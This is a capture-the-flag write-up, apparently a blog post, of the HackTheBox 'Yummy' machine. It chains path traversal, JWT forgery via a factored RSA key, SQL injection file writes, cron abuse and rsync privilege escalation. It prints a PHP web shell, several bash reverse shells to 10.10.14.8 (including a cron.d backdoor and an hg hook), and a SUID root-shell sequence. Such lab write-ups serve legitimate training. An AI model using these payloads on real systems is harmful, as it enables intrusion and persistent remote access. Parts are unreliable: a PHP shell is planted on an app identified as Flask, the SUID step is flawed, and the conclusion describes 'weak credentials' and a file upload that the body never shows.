Introduction

This post walks through the HackTheBox Yummy machine, showcasing multiple vulnerabilities that must be chained together to gain root access. The attack flow involves file disclosure, JWT manipulation, SQL injection, and Linux cron job abuse to escalate privileges.

HackTheBox Yummy Description

HackTheBox Yummy is a hard box that starts with a Restaurant web app using Caddy web service, on port 80, where an attacker finds an arbitrary file read HTTP Location header, which is not handled and sanitized properly by default Caddy default configuration.

Reading the source code, the web app uses JWT RSA keypairs to forge an admin token and escalate privileges on the web app.

The admin panel has an SQL injection, allowing arbitrary file write, the attacker now overwrites a file running periodically (`cronjob`). Improper directory permissions allow the attacker to move laterally to `www-data` and eventually `dev` user. The `dev` user can execute `rsync` binary as root, which helps escalate privileges to root.

Walkthrough

Reconnaissance and Initial Enumeration

The attack starts with network scanning using nmap:

nmap -sC -sV -oA yummy 10.10.11.36

The scan reveals two open ports:

  • Port 22 (SSH) – Ubuntu SSH Server running.
  • Port 80 (HTTP) – Hosting a website with Caddy web server (typically used for secure TLS support).

The website at http://yummy.htb/ is a restaurant booking application with a login and register feature.

echo "10.10.11.36 yummy.htb" | sudo tee -a /etc/hosts

Web Application Analysis

The site appears to be a restaurant reservation system. To fingerprint the backend framework, the attacker accesses a non-existent page (404 Not Found), revealing a Flask error page. This confirms the backend is Python-based, helping guide the attack methodology.

  • Potential Attack Surface:
    • Login & Registration Forms (Possible SQL Injection)
    • Table Booking Feature (Potential XSS, File Upload, SSRF, etc.)
    • Admin Panel (If Discovered)

Sensitive File Disclosure via Path Traversal

The “Save to Calendar” feature allows downloading .ics files. By modifying the request, sensitive files like /etc/passwd can be retrieved:

/export?file=../../../../../etc/passwd

Use /proc/self/environ to check environment variables for credentials.

JWT Token Exploitation – Gaining Admin Privileges

When a user tries to access /admindashboard as specified in app.py, the application triggers the validate_login() function (located on line 268 of app.py).

The validate_login() function, defined on line 166, calls verify_token() on line 168. This function is imported from the /opt/app/middleware/verification.py file.

During execution, verify_token() decodes the user’s JWT and checks the roles listed in the claims section. A valid role must be either customer or administrator.

On line 25, the function returns the user’s email and current role to verify_token(), which then passes it back to app.py.

Lines 169–172 in app.py determine whether the user is an administrator or a regular user. If the user is an administrator, the application renders the admindashboard.html template according to the /admindashboard route in app.py.

By inspecting the JWT authentication tokens, the attacker finds that the token is signed using RSA with a weak 1024-bit key, which can be factored to derive the private key:

Steps to Break JWT Authentication:

  1. Extract the Public Key (N) from JWT.
  2. Factorize N using RSACTF-Tool to obtain P and Q.
  3. Generate a new private key.
  4. Sign a new JWT token with role: administrator and authenticate as an admin.

Commands used:

python3 RSACTF-Tool.py -n <N_value> -e 65537

openssl rsa -in private.pem -outform PEM -pubout -out public.pem

Once the new JWT is signed, it can be injected into the browser’s local storage, allowing full access to the admin panel.

SQL Injection – Writing Malicious Files to Disk

In the admin panel, an SQL injection vulnerability is discovered in the reservation deletion functionality. Since MySQL is misconfigured to allow INTO OUTFILE, the attacker can write a PHP or shell script to disk and execute it.

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

This allows remote code execution (RCE) by visiting:

http://yummy.htb/shell.php?cmd=id

Alternative SQL Injection Path:
By leveraging stacked queries, the attacker writes a cron job payload that executes a reverse shell.

SELECT '*/1 * * * * /bin/bash -c "bash -i >& /dev/tcp/10.10.14.8/9001 0>&1"' INTO OUTFILE '/etc/cron.d/backdoor';

The backdoor executes every minute, providing a persistent reverse shell.

Leveraging SQL Injection & Cron Job Exploitation – Privilege Escalation to www-data

Exploit MySQL’s INTO OUTFILE capability:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

If INTO OUTFILE is disabled, write a reverse shell script inside /data/scripts.

Once an initial foothold is gained, we see that a cron job executes scripts from /data/scripts/db_monitor.sh. We can then Inject a reverse shell script into /data/scripts/ using SQLi:

SELECT "bash -i >& /dev/tcp/10.10.14.8/9001 0>&1" INTO OUTFILE '/data/scripts/payload.sh';

Alternatively by placing a malicious script in this directory, the attacker achieves arbitrary code execution.

echo "bash -i >& /dev/tcp/10.10.14.8/9001 0>&1" > /data/scripts/fixer_99.sh

chmod +x /data/scripts/fixer_99.sh

The cron job executes this script automatically, upgrading access to MySQL user privileges.

nc -lvnp 9001

Privilege Escalation to Root – Exploiting rsync

The www-data user also has cron jobs running. Inject a payload in /var/www/html/backup.sh, which runs as www-data.

The final privilege escalation involves abusing wildcard expansion in rsync, which is misconfigured in sudoers.

First, hg repository hooks allow command execution

echo '[hooks]' > .hg/hgrc
echo 'changegroup = bash -i >& /dev/tcp/10.10.14.8/9002 0>&1' >> .hg/hgrc

Trigger with

hg pull

Next, sudo -l shows rsync can be run with --chown=root:root so we copy /bin/bash and set SUID bit

rsync -a --chown=root:root /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
/tmp/rootbash -p

This copies /bin/bash, sets the SUID bit, and grants a root shell.

Mitigations & Prevention

Use Strong JWT KeysRSA 4096-bit or higher.

Prevent SQL Injection – Use prepared statements and parameterized queries.

Restrict File Access – MySQL SECURE_FILE_PRIV should be set.

Secure Cron JobsRemove write access to cron-executed directories.

Properly Configure sudo Rules – Avoid sudo commands that allow arbitrary file execution.

Conclusion

The writeup demonstrates a methodical approach to compromising the “Yummy” machine on HackTheBox. By conducting thorough enumeration, they identify a web application running on port 80. Through analysis, they discover a SQL injection vulnerability, which is exploited to retrieve sensitive information from the database.

Further investigation reveals an administrative portal with weak credentials, allowing for unauthorized access. The author then uploads a malicious file to achieve remote code execution, ultimately gaining root privileges on the system.

You can also watch:

,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles